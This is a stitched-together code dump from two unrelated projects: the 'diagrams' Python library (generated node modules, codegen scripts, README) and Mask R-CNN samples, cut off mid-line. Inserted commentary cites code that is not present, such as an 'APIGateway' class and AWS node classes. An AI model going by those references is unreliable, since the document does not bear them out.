diagrams/saas/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Saas class _Analytics(_Saas): _type = "analytics" _icon_dir = "resources/saas/analytics" class Dataform(_Analytics): _icon = "dataform.png" class Snowflake(_Analytics): _icon = "snowflake.png" class Stitch(_Analytics): _icon = "stitch.png" # Aliases File: diagrams/saas/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Identity(_Saas): _type = "identity" _icon_dir = "resources/saas/identity" class Auth0(_Identity): _icon = "auth0.png" class Okta(_Identity): _icon = "okta.png" # Aliases File: diagrams/saas/alerting.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Alerting(_Saas): _type = "alerting" _icon_dir = "resources/saas/alerting" class Newrelic(_Alerting): _icon = "newrelic.png" class Opsgenie(_Alerting): _icon = "opsgenie.png" class Pagerduty(_Alerting): _icon = "pagerduty.png" class Pushover(_Alerting): _icon = "pushover.png" class Xmatters(_Alerting): _icon = "xmatters.png" # Aliases File: diagrams/base/__init__.py """ Base provides a set of general services for backend infrastructure. """ from diagrams import Node class _Base(Node): _provider = "base" _icon_dir = "resources/base" fontcolor = "#ffffff" File: scripts/generate.py import os import sys from typing import Iterable from jinja2 import Environment, FileSystemLoader, Template, exceptions import config as cfg from . import app_root_dir, doc_root_dir, resource_dir, template_dir, base_dir _usage = "Usage: generate.py <provider>" def load_tmpl(tmpl: str) -> Template: env = Environment(loader=FileSystemLoader(template_dir())) env.filters["up_or_title"] = up_or_title return env.get_template(tmpl) def up_or_title(pvd: str, s: str) -> str: if s in cfg.UPPER_WORDS.get(pvd, ()): return s.upper() if s in cfg.TITLE_WORDS.get(pvd, {}): return cfg.TITLE_WORDS[pvd][s] return s.title() def gen_classes(pvd: str, typ: str, paths: Iterable[str]) -> str: """Generate all service node classes based on resources paths with class templates.""" tmpl = load_tmpl(cfg.TMPL_MODULE) # TODO: extract the gen class metas for sharing # TODO: independent function for generating all pvd/typ/paths pairs def _gen_class_meta(path: str) -> dict: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return {"name": name, "icon": path} metas = map(_gen_class_meta, paths) aliases = cfg.ALIASES[pvd][typ] if typ in cfg.ALIASES[pvd] else {} return tmpl.render(pvd=pvd, typ=typ, metas=metas, aliases=aliases) def gen_apidoc(pvd: str, typ_paths: dict) -> str: try: default_tmp = cfg.TMPL_APIDOC.split('.') tmpl_file = f"{default_tmp[0]}_{pvd}.{default_tmp[1]}" tmpl = load_tmpl(tmpl_file) except exceptions.TemplateNotFound: tmpl = load_tmpl(cfg.TMPL_APIDOC) # TODO: remove def _gen_class_name(path: str) -> str: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return name typ_classes = {} for typ, (paths, resource_root) in sorted(typ_paths.items()): typ_classes[typ] = [] for path in paths: name = _gen_class_name(path) resource_path = os.path.join(resource_root, path) alias = cfg.ALIASES[pvd].get(typ, {}).get(name) typ_classes[typ].append({"name": name, "alias": alias, "resource_path": resource_path}) return tmpl.render(pvd=pvd, typ_classes=typ_classes) def make_module(pvd: str, typ: str, classes: str) -> None: """Create a module file""" mod_path = os.path.join(app_root_dir(pvd), f"{typ}.py") with open(mod_path, "w+") as f: f.write(classes) def make_apidoc(pvd: str, content: 
str) -> None: """Create an api documentation file""" mod_path = os.path.join(doc_root_dir(), f"{pvd}.md") with open(mod_path, "w+") as f: f.write(content) def generate(pvd: str) -> None: """Generates a service node classes.""" typ_paths = {} base = base_dir() for root, _, files in os.walk(resource_dir(pvd)): # Extract the names and paths from resources. files.sort() pngs = list(filter(lambda f: f.endswith(".png"), files)) paths = list(filter(lambda f: "rounded" not in f, pngs)) # Skip the top-root directory. typ = os.path.basename(root) if typ == pvd: continue resource_root = os.path.relpath(root, base) classes = gen_classes(pvd, typ, paths) make_module(pvd, typ, classes) typ_paths[typ] = (paths, resource_root) # Build API documentation apidoc = gen_apidoc(pvd, typ_paths) make_apidoc(pvd, apidoc) if __name__ == "__main__": pvd = sys.argv[1] if pvd not in cfg.PROVIDERS: sys.exit() generate(pvd) File: scripts/resource.py """ resources.py provides useful tools for resources processing. There are 2 commands available. - clean: clean and unify the resources file names with some rules. - round: generate the rounded images from the original squared images. """ import os import subprocess import sys import config as cfg from . import resource_dir _usage = "Usage: resource.py <cmd> <pvd>" def cleaner_onprem(f): f = f.replace("_", "-") return f.lower() def cleaner_aws(f): f = f.replace("_", "-") f = f.replace("@4x", "") f = f.replace("@5x", "") f = f.replace("2.0", "2-0") f = f.replace("-light-bg4x", "") f = f.replace("-light-bg", "") for p in cfg.FILE_PREFIXES["aws"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_azure(f): f = f.replace("_", "-") f = f.replace("(", "").replace(")", "") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["azure"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_gcp(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["gcp"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_ibm(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["ibm"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_firebase(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["firebase"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_k8s(f): f = f.replace("-256", "") for p in cfg.FILE_PREFIXES["k8s"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_digitalocean(f): f = f.replace("-32", "") for p in cfg.FILE_PREFIXES["digitalocean"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_alibabacloud(f): for p in cfg.FILE_PREFIXES["alibabacloud"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_oci(f): f = f.replace(" ", "-") f = f.replace("_", "-") for p in cfg.FILE_PREFIXES["oci"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_programming(f): return f.lower() def cleaner_generic(f): return f.lower() def cleaner_saas(f): return f.lower() def cleaner_elastic(f): return f.lower() def cleaner_outscale(f): return f.lower() def cleaner_openstack(f): return f.lower() cleaners = { "onprem": cleaner_onprem, "aws": cleaner_aws, "azure": cleaner_azure, "digitalocean": cleaner_digitalocean, "gcp": cleaner_gcp, "ibm": cleaner_ibm, "firebase": cleaner_firebase, "k8s": cleaner_k8s, "alibabacloud": cleaner_alibabacloud, "oci": cleaner_oci, "programming": cleaner_programming, "saas": cleaner_saas, "elastic": cleaner_elastic, "outscale": 
cleaner_outscale, "generic": cleaner_generic, "openstack": cleaner_openstack, } def clean_png(pvd: str) -> None: """Refine the resources files names.""" def _rename(base: str, png: str): new = cleaners[pvd](png) old_path = os.path.join(base, png) new_path = os.path.join(base, new) os.rename(old_path, new_path) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) [_rename(root, png) for png in pngs] def round_png(pvd: str) -> None: """Round the images.""" def _round(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_ROUND, *cfg.CMD_ROUND_OPTS, path]) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) paths = filter(lambda f: "rounded" not in f, pngs) [_round(root, path) for path in paths] def svg2png(pvd: str) -> None: """Convert the svg into png""" def _convert(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_SVG2PNG, *cfg.CMD_SVG2PNG_OPTS, path]) subprocess.run(["rm", path]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] def svg2png2(pvd: str) -> None: """Convert the svg into png using image magick""" def _convert(base: str, path: str): path_src = os.path.join(base, path) path_dest = path_src.replace(".svg", ".png") subprocess.run([cfg.CMD_SVG2PNG_IM, *cfg.CMD_SVG2PNG_IM_OPTS, path_src, path_dest]) subprocess.run(["rm", path_src]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] # fmt: off commands = { "clean": clean_png, "round": round_png, "svg2png": svg2png, "svg2png2": svg2png2, } # fmt: on if __name__ == "__main__": if len(sys.argv) < 3: print(_usage) sys.exit() cmd = sys.argv[1] pvd = sys.argv[2] if cmd not in commands: sys.exit() if pvd not in cfg.PROVIDERS: sys.exit() commands[cmd](pvd) File: scripts/__init__.py import os from pathlib import Path import config as cfg def base_dir() -> Path: return Path(os.path.abspath(os.path.dirname(__file__))).parent def app_root_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_APP_ROOT, pvd) def doc_root_dir() -> str: return os.path.join(base_dir(), cfg.DIR_DOC_ROOT) def resource_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_RESOURCE, pvd) def template_dir() -> str: return os.path.join(base_dir(), cfg.DIR_TEMPLATE)
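To make the generation pipeline above concrete, here is an illustrative sketch of the two naming transformations it applies: a cleaner normalizes the raw icon file name, and `up_or_title` then builds the class name word by word. The outputs below assume none of the words appear in `config.UPPER_WORDS` or `config.TITLE_WORDS`; special-cased words (for example `api` for AWS, which is how `APIGateway` rather than `ApiGateway` appears in the generated module above) would come from that config, which is not shown here.

```python
# Illustrative walk-through of the codegen naming rules (not part of the scripts).
def cleaner_onprem(f: str) -> str:
    # Same logic as the onprem cleaner in scripts/resource.py.
    return f.replace("_", "-").lower()

def title_words(base: str) -> str:
    # up_or_title() without the UPPER_WORDS / TITLE_WORDS config lookups.
    return "".join(word.title() for word in base.split("-"))

icon = cleaner_onprem("Elastic_Load_Balancing.png")   # -> "elastic-load-balancing.png"
name = title_words(icon.rsplit(".", 1)[0])            # -> "ElasticLoadBalancing"
print(icon, name)
```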
![diagrams logo](assets/img/diagrams.png)

# Diagrams

[![license](https://img.shields.io/badge/license-MIT-blue.svg)](/LICENSE)
[![pypi version](https://badge.fury.io/py/diagrams.svg)](https://badge.fury.io/py/diagrams)
![python version](https://img.shields.io/badge/python-%3E%3D%203.6-blue?logo=python)
![Run tests](https://github.com/mingrammer/diagrams/workflows/Run%20tests/badge.svg?branch=master)
[![todos](https://badgen.net/https/api.tickgit.com/badgen/github.com/mingrammer/diagrams?label=todos)](https://www.tickgit.com/browse?repo=github.com/mingrammer/diagrams)
![contributors](https://img.shields.io/github/contributors/mingrammer/diagrams)

<a href="https://www.buymeacoffee.com/mingrammer" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>

**Diagram as Code**. Diagrams lets you draw cloud system architecture **in Python code**. It was born for **prototyping** a new system architecture without any design tools, and you can also use it to describe or visualize an existing architecture. Diagrams currently supports the major providers, including `AWS`, `Azure`, `GCP`, `Kubernetes`, `Alibaba Cloud`, `Oracle Cloud`, and more. It also supports `On-Premise` nodes, `SaaS` services, and major `Programming` frameworks and languages.

**Diagram as Code** also allows you to **track** architecture diagram changes in any **version control** system.

> NOTE: It does not control any actual cloud resources, nor does it generate CloudFormation or Terraform code. It is just for drawing cloud system architecture diagrams.

## Providers

![aws provider](https://img.shields.io/badge/AWS-orange?logo=amazon-aws&color=ff9900)
![azure provider](https://img.shields.io/badge/Azure-orange?logo=microsoft-azure&color=0089d6)
![gcp provider](https://img.shields.io/badge/GCP-orange?logo=google-cloud&color=4285f4)
![ibm provider](https://img.shields.io/badge/IBM-orange?logo=ibm&color=052FAD)
![kubernetes provider](https://img.shields.io/badge/Kubernetes-orange?logo=kubernetes&color=326ce5)
![alibaba cloud provider](https://img.shields.io/badge/AlibabaCloud-orange?logo=alibaba-cloud&color=ff6a00)
![oracle cloud provider](https://img.shields.io/badge/OracleCloud-orange?logo=oracle&color=f80000)
![openstack provider](https://img.shields.io/badge/OpenStack-orange?logo=openstack&color=da1a32)
![firebase provider](https://img.shields.io/badge/Firebase-orange?logo=firebase&color=FFCA28)
![digital ocean provider](https://img.shields.io/badge/DigitalOcean-0080ff?logo=digitalocean&color=0080ff)
![elastic provider](https://img.shields.io/badge/Elastic-orange?logo=elastic&color=005571)
![outscale provider](https://img.shields.io/badge/OutScale-orange?color=5f87bf)
![on premise provider](https://img.shields.io/badge/OnPremise-orange?color=5f87bf)
![generic provider](https://img.shields.io/badge/Generic-orange?color=5f87bf)
![programming provider](https://img.shields.io/badge/Programming-orange?color=5f87bf)
![saas provider](https://img.shields.io/badge/SaaS-orange?color=5f87bf)
![c4 provider](https://img.shields.io/badge/C4-orange?color=5f87bf)

## Getting Started

It requires **Python 3.7** or higher; check your Python version first. It uses [Graphviz](https://www.graphviz.org/) to render the diagram, so you need to [install Graphviz](https://graphviz.gitlab.io/download/) to use **diagrams**.
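Since diagrams ultimately calls Graphviz's `dot` executable to render output, it can help to confirm that it is on your `PATH` before going further; the snippet below is only an illustrative sketch, not part of the project.

```python
# Illustrative sanity check: diagrams needs the Graphviz "dot" executable.
import shutil

dot = shutil.which("dot")
if dot is None:
    print("Graphviz 'dot' not found on PATH; install Graphviz before using diagrams.")
else:
    print("Graphviz found at:", dot)
```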
After installing Graphviz (or if you already have it), install **diagrams**.

> macOS users can install Graphviz via `brew install graphviz` if they're using [Homebrew](https://brew.sh).

```shell
# using pip (pip3)
$ pip install diagrams

# using pipenv
$ pipenv install diagrams

# using poetry
$ poetry add diagrams
```

You can start with the [quick start](https://diagrams.mingrammer.com/docs/getting-started/installation#quick-start). Check out the [guides](https://diagrams.mingrammer.com/docs/guides/diagram) for more details, and you can find the full list of available nodes [here](https://diagrams.mingrammer.com/docs/nodes/aws).

## Examples

| Event Processing | Stateful Architecture | Advanced Web Service |
| --- | --- | --- |
| ![event processing](https://diagrams.mingrammer.com/img/event_processing_diagram.png) | ![stateful architecture](https://diagrams.mingrammer.com/img/stateful_architecture_diagram.png) | ![advanced web service with on-premise](https://diagrams.mingrammer.com/img/advanced_web_service_with_on-premise.png) |

You can find all the examples on the [examples](https://diagrams.mingrammer.com/docs/getting-started/examples) page.

## Contributing

To contribute to diagrams, check out the [contribution guidelines](CONTRIBUTING.md).

> Let me know if you are using diagrams! I'll add you to the showcase page. (I'm working on it!) :)

## Who uses it?

[Apache Airflow](https://github.com/apache/airflow), the most popular data workflow orchestrator, uses Diagrams to generate architecture diagrams in its documentation.

[Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It uses this Diagrams library to create a diagram of the analyzed cloud resources, so you can draw your existing cloud infrastructure with Cloudiscovery.

[Airflow Diagrams](https://github.com/feluelle/airflow-diagrams) is an Airflow plugin that aims to easily visualise your Airflow DAGs at the service level, for providers like AWS, GCP, Azure, etc., via diagrams.

## Other languages

- If you are familiar with Go, you can use [go-diagrams](https://github.com/blushft/go-diagrams) as well.

## License

[MIT](LICENSE)
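For a concrete feel of the API that the AWS modules listed earlier expose, a minimal script might look like the following sketch. `Diagram`, its `show` argument, and the `>>` connector are taken from the quick start linked above and are assumptions here; `ELB` and `EC2` are the node classes from `diagrams.aws.network` and `diagrams.aws.compute` shown in this repo dump.

```python
# Minimal sketch: render a tiny load-balanced web service diagram to a PNG.
from diagrams import Diagram
from diagrams.aws.compute import EC2
from diagrams.aws.network import ELB

with Diagram("Simple Web Service", show=False):
    lb = ELB("lb")
    # Each arrow adds an edge from the load balancer to a web node.
    lb >> EC2("web1")
    lb >> EC2("web2")
```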
Mask_RCNN
3deaec5d902d16e1daf56b62d5971d428dc920bc
File: setup.py """ The build/compilations setup >> pip install -r requirements.txt >> python setup.py install """ import pip import logging import pkg_resources try: from setuptools import setup except ImportError: from distutils.core import setup def _parse_requirements(file_path): pip_ver = pkg_resources.get_distribution('pip').version pip_version = list(map(int, pip_ver.split('.')[:2])) if pip_version >= [6, 0]: raw = pip.req.parse_requirements(file_path, session=pip.download.PipSession()) else: raw = pip.req.parse_requirements(file_path) return [str(i.req) for i in raw] # parse_requirements() returns generator of pip.req.InstallRequirement objects try: install_reqs = _parse_requirements("requirements.txt") except Exception: logging.warning('Fail load requirements file, so using default ones.') install_reqs = [] setup( name='mask-rcnn', version='2.1', url='https://github.com/matterport/Mask_RCNN', author='Matterport', author_email='[email protected]', license='MIT', description='Mask R-CNN for object detection and instance segmentation', packages=["mrcnn"], install_requires=install_reqs, include_package_data=True, python_requires='>=3.4', long_description="""This is an implementation of Mask R-CNN on Python 3, Keras, and TensorFlow. The model generates bounding boxes and segmentation masks for each instance of an object in the image. It's based on Feature Pyramid Network (FPN) and a ResNet101 backbone.""", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Information Technology", "Intended Audience :: Education", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Operating System :: OS Independent", "Topic :: Scientific/Engineering :: Artificial Intelligence", "Topic :: Scientific/Engineering :: Image Recognition", "Topic :: Scientific/Engineering :: Visualization", "Topic :: Scientific/Engineering :: Image Segmentation", 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', ], keywords="image instance segmentation object detection mask rcnn r-cnn tensorflow keras", ) File: samples/balloon/balloon.py """ Mask R-CNN Train on the toy Balloon dataset and implement color splash effect. Copyright (c) 2018 Matterport, Inc. 
Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla ------------------------------------------------------------ Usage: import the module (see Jupyter notebooks for examples), or run from the command line as such: # Train a new model starting from pre-trained COCO weights python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=coco # Resume training a model that you had trained earlier python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=last # Train a new model starting from ImageNet weights python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=imagenet # Apply color splash to an image python3 balloon.py splash --weights=/path/to/weights/file.h5 --image=<URL or path to file> # Apply color splash to video using the last weights you trained python3 balloon.py splash --weights=last --video=<URL or path to file> """ import os import sys import json import datetime import numpy as np import skimage.draw # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import model as modellib, utils # Path to trained weights file COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") ############################################################ # Configurations ############################################################ class BalloonConfig(Config): """Configuration for training on the toy dataset. Derives from the base Config class and overrides some values. """ # Give the configuration a recognizable name NAME = "balloon" # We use a GPU with 12GB memory, which can fit two images. # Adjust down if you use a smaller GPU. IMAGES_PER_GPU = 2 # Number of classes (including background) NUM_CLASSES = 1 + 1 # Background + balloon # Number of training steps per epoch STEPS_PER_EPOCH = 100 # Skip detections with < 90% confidence DETECTION_MIN_CONFIDENCE = 0.9 ############################################################ # Dataset ############################################################ class BalloonDataset(utils.Dataset): def load_balloon(self, dataset_dir, subset): """Load a subset of the Balloon dataset. dataset_dir: Root directory of the dataset. subset: Subset to load: train or val """ # Add classes. We have only one class to add. self.add_class("balloon", 1, "balloon") # Train or validation dataset? assert subset in ["train", "val"] dataset_dir = os.path.join(dataset_dir, subset) # Load annotations # VGG Image Annotator (up to version 1.6) saves each image in the form: # { 'filename': '28503151_5b5b7ec140_b.jpg', # 'regions': { # '0': { # 'region_attributes': {}, # 'shape_attributes': { # 'all_points_x': [...], # 'all_points_y': [...], # 'name': 'polygon'}}, # ... more regions ... # }, # 'size': 100202 # } # We mostly care about the x and y coordinates of each region # Note: In VIA 2.0, regions was changed from a dict to a list. annotations = json.load(open(os.path.join(dataset_dir, "via_region_data.json"))) annotations = list(annotations.values()) # don't need the dict keys # The VIA tool saves images in the JSON even if they don't have any # annotations. Skip unannotated images. 
annotations = [a for a in annotations if a['regions']] # Add images for a in annotations: # Get the x, y coordinaets of points of the polygons that make up # the outline of each object instance. These are stores in the # shape_attributes (see json format above) # The if condition is needed to support VIA versions 1.x and 2.x. if type(a['regions']) is dict: polygons = [r['shape_attributes'] for r in a['regions'].values()] else: polygons = [r['shape_attributes'] for r in a['regions']] # load_mask() needs the image size to convert polygons to masks. # Unfortunately, VIA doesn't include it in JSON, so we must read # the image. This is only managable since the dataset is tiny. image_path = os.path.join(dataset_dir, a['filename']) image = skimage.io.imread(image_path) height, width = image.shape[:2] self.add_image( "balloon", image_id=a['filename'], # use file name as a unique image id path=image_path, width=width, height=height, polygons=polygons) def load_mask(self, image_id): """Generate instance masks for an image. Returns: masks: A bool array of shape [height, width, instance count] with one mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ # If not a balloon dataset image, delegate to parent class. image_info = self.image_info[image_id] if image_info["source"] != "balloon": return super(self.__class__, self).load_mask(image_id) # Convert polygons to a bitmap mask of shape # [height, width, instance_count] info = self.image_info[image_id] mask = np.zeros([info["height"], info["width"], len(info["polygons"])], dtype=np.uint8) for i, p in enumerate(info["polygons"]): # Get indexes of pixels inside the polygon and set them to 1 rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x']) mask[rr, cc, i] = 1 # Return mask, and array of class IDs of each instance. Since we have # one class ID only, we return an array of 1s return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32) def image_reference(self, image_id): """Return the path of the image.""" info = self.image_info[image_id] if info["source"] == "balloon": return info["path"] else: super(self.__class__, self).image_reference(image_id) def train(model): """Train the model.""" # Training dataset. dataset_train = BalloonDataset() dataset_train.load_balloon(args.dataset, "train") dataset_train.prepare() # Validation dataset dataset_val = BalloonDataset() dataset_val.load_balloon(args.dataset, "val") dataset_val.prepare() # *** This training schedule is an example. Update to your needs *** # Since we're using a very small dataset, and starting from # COCO trained weights, we don't need to train too long. Also, # no need to train all layers, just the heads should do it. print("Training network heads") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=30, layers='heads') def color_splash(image, mask): """Apply color splash effect. image: RGB image [height, width, 3] mask: instance segmentation mask [height, width, instance count] Returns result image. """ # Make a grayscale copy of the image. The grayscale copy still # has 3 RGB channels, though. 
gray = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255 # Copy color pixels from the original color image where mask is set if mask.shape[-1] > 0: # We're treating all instances as one, so collapse the mask into one layer mask = (np.sum(mask, -1, keepdims=True) >= 1) splash = np.where(mask, image, gray).astype(np.uint8) else: splash = gray.astype(np.uint8) return splash def detect_and_color_splash(model, image_path=None, video_path=None): assert image_path or video_path # Image or video? if image_path: # Run model detection and generate the color splash effect print("Running on {}".format(args.image)) # Read image image = skimage.io.imread(args.image) # Detect objects r = model.detect([image], verbose=1)[0] # Color splash splash = color_splash(image, r['masks']) # Save output file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now()) skimage.io.imsave(file_name, splash) elif video_path: import cv2 # Video capture vcapture = cv2.VideoCapture(video_path) width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH)) height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT)) fps = vcapture.get(cv2.CAP_PROP_FPS) # Define codec and create video writer file_name = "splash_{:%Y%m%dT%H%M%S}.avi".format(datetime.datetime.now()) vwriter = cv2.VideoWriter(file_name, cv2.VideoWriter_fourcc(*'MJPG'), fps, (width, height)) count = 0 success = True while success: print("frame: ", count) # Read next image success, image = vcapture.read() if success: # OpenCV returns images as BGR, convert to RGB image = image[..., ::-1] # Detect objects r = model.detect([image], verbose=0)[0] # Color splash splash = color_splash(image, r['masks']) # RGB -> BGR to save image to video splash = splash[..., ::-1] # Add image to video writer vwriter.write(splash) count += 1 vwriter.release() print("Saved to ", file_name) ############################################################ # Training ############################################################ if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Train Mask R-CNN to detect balloons.') parser.add_argument("command", metavar="<command>", help="'train' or 'splash'") parser.add_argument('--dataset', required=False, metavar="/path/to/balloon/dataset/", help='Directory of the Balloon dataset') parser.add_argument('--weights', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--image', required=False, metavar="path or URL to image", help='Image to apply the color splash effect on') parser.add_argument('--video', required=False, metavar="path or URL to video", help='Video to apply the color splash effect on') args = parser.parse_args() # Validate arguments if args.command == "train": assert args.dataset, "Argument --dataset is required for training" elif args.command == "splash": assert args.image or args.video,\ "Provide --image or --video to apply color splash" print("Weights: ", args.weights) print("Dataset: ", args.dataset) print("Logs: ", args.logs) # Configurations if args.command == "train": config = BalloonConfig() else: class InferenceConfig(BalloonConfig): # Set batch size to 1 since we'll be running inference on # one image at a time. 
Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() config.display() # Create model if args.command == "train": model = modellib.MaskRCNN(mode="training", config=config, model_dir=args.logs) else: model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load if args.weights.lower() == "coco": weights_path = COCO_WEIGHTS_PATH # Download weights file if not os.path.exists(weights_path): utils.download_trained_weights(weights_path) elif args.weights.lower() == "last": # Find last trained weights weights_path = model.find_last() elif args.weights.lower() == "imagenet": # Start from ImageNet trained weights weights_path = model.get_imagenet_weights() else: weights_path = args.weights # Load weights print("Loading weights ", weights_path) if args.weights.lower() == "coco": # Exclude the last layers because they require a matching # number of classes model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]) else: model.load_weights(weights_path, by_name=True) # Train or evaluate if args.command == "train": train(model) elif args.command == "splash": detect_and_color_splash(model, image_path=args.image, video_path=args.video) else: print("'{}' is not recognized. " "Use 'train' or 'splash'".format(args.command)) File: samples/shapes/shapes.py """ Mask R-CNN Configurations and data loading code for the synthetic Shapes dataset. This is a duplicate of the code in the noteobook train_shapes.ipynb for easy import into other notebooks, such as inspect_model.ipynb. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import os import sys import math import random import numpy as np import cv2 # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import utils class ShapesConfig(Config): """Configuration for training on the toy shapes dataset. Derives from the base Config class and overrides values specific to the toy shapes dataset. """ # Give the configuration a recognizable name NAME = "shapes" # Train on 1 GPU and 8 images per GPU. We can put multiple images on each # GPU because the images are small. Batch size is 8 (GPUs * images/GPU). GPU_COUNT = 1 IMAGES_PER_GPU = 8 # Number of classes (including background) NUM_CLASSES = 1 + 3 # background + 3 shapes # Use small images for faster training. Set the limits of the small side # the large side, and that determines the image shape. IMAGE_MIN_DIM = 128 IMAGE_MAX_DIM = 128 # Use smaller anchors because our image and objects are small RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) # anchor side in pixels # Reduce training ROIs per image because the images are small and have # few objects. Aim to allow ROI sampling to pick 33% positive ROIs. TRAIN_ROIS_PER_IMAGE = 32 # Use a small epoch since the data is simple STEPS_PER_EPOCH = 100 # use small validation steps since the epoch is small VALIDATION_STEPS = 5 class ShapesDataset(utils.Dataset): """Generates the shapes synthetic dataset. The dataset consists of simple shapes (triangles, squares, circles) placed randomly on a blank surface. The images are generated on the fly. No file access required. """ def load_shapes(self, count, height, width): """Generate the requested number of synthetic images. count: number of images to generate. 
height, width: the size of the generated images. """ # Add classes self.add_class("shapes", 1, "square") self.add_class("shapes", 2, "circle") self.add_class("shapes", 3, "triangle") # Add images # Generate random specifications of images (i.e. color and # list of shapes sizes and locations). This is more compact than # actual images. Images are generated on the fly in load_image(). for i in range(count): bg_color, shapes = self.random_image(height, width) self.add_image("shapes", image_id=i, path=None, width=width, height=height, bg_color=bg_color, shapes=shapes) def load_image(self, image_id): """Generate an image from the specs of the given image ID. Typically this function loads the image from a file, but in this case it generates the image on the fly from the specs in image_info. """ info = self.image_info[image_id] bg_color = np.array(info['bg_color']).reshape([1, 1, 3]) image = np.ones([info['height'], info['width'], 3], dtype=np.uint8) image = image * bg_color.astype(np.uint8) for shape, color, dims in info['shapes']: image = self.draw_shape(image, shape, dims, color) return image def image_reference(self, image_id): """Return the shapes data of the image.""" info = self.image_info[image_id] if info["source"] == "shapes": return info["shapes"] else: super(self.__class__).image_reference(self, image_id) def load_mask(self, image_id): """Generate instance masks for shapes of the given image ID. """ info = self.image_info[image_id] shapes = info['shapes'] count = len(shapes) mask = np.zeros([info['height'], info['width'], count], dtype=np.uint8) for i, (shape, _, dims) in enumerate(info['shapes']): mask[:, :, i:i + 1] = self.draw_shape(mask[:, :, i:i + 1].copy(), shape, dims, 1) # Handle occlusions occlusion = np.logical_not(mask[:, :, -1]).astype(np.uint8) for i in range(count - 2, -1, -1): mask[:, :, i] = mask[:, :, i] * occlusion occlusion = np.logical_and( occlusion, np.logical_not(mask[:, :, i])) # Map class names to class IDs. class_ids = np.array([self.class_names.index(s[0]) for s in shapes]) return mask, class_ids.astype(np.int32) def draw_shape(self, image, shape, dims, color): """Draws a shape from the given specs.""" # Get the center x, y and the size s x, y, s = dims if shape == 'square': image = cv2.rectangle(image, (x - s, y - s), (x + s, y + s), color, -1) elif shape == "circle": image = cv2.circle(image, (x, y), s, color, -1) elif shape == "triangle": points = np.array([[(x, y - s), (x - s / math.sin(math.radians(60)), y + s), (x + s / math.sin(math.radians(60)), y + s), ]], dtype=np.int32) image = cv2.fillPoly(image, points, color) return image def 